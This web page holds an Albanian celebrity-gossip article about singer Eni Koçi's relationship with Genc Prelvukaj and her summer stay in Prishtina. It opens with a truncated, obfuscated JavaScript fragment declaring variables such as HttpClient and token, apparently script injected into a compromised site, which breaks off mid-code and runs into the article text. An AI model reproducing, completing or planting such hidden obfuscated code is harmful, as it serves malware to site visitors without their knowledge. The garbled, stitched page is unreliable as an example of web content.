;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

‘Sakrifica’ për dashurinë: Eni Koçi…

By

Tashmë nuk është sekret! Ashtu siç kishte konfirmuar Prive disa javë më parë, Eni Koçi dhe Genc Prelvukajn përbëjnë një prej çifteve më të reja në shoubizin shqiptar.

Ndonëse kishin tentuar të mohojnë një gjë të tillë, fotot e publikuara pak ditë më parë në media i tradhëtuan.

E një prej problemeve kryesore në një lidhje të tillë – ai i distancës me Gencin që jeton në Kosovë kurse Eni në Londër duket se për çiftin është tejkaluar, të paktën përkohësisht.

Burime të portalit tonë kanë bërë me dije se ‘sakrifica’ e parë për muajt e verës është bërë nga Eni e cila po qëndron shumicën e kohës në Prishtinë duke u zhvendosur në kryeqytetin tonë.

Mbetet për t’u parë se si do e menaxhojë dyshja distancën dhe kohën me ardhjen e Shtatorit por me kiminë perfekte dhe seriozitetin e lidhjes të paktën tani për tani, kjo duket të mos jetë një pengesë e madhe. /Prive.al/

Artikuj të ngjashëm